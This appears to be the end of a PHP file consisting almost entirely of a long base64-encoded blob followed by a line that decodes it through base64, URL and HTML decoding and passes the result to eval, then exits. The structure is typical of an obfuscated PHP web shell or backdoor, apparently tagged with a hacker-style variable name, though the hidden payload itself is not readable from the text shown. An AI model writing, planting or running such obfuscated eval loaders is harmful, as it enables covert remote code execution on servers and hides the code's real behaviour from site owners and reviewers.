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";
eval(htmlspecialchars_decode(urldecode(base64_decode($JhonCoders))));
exit;
?>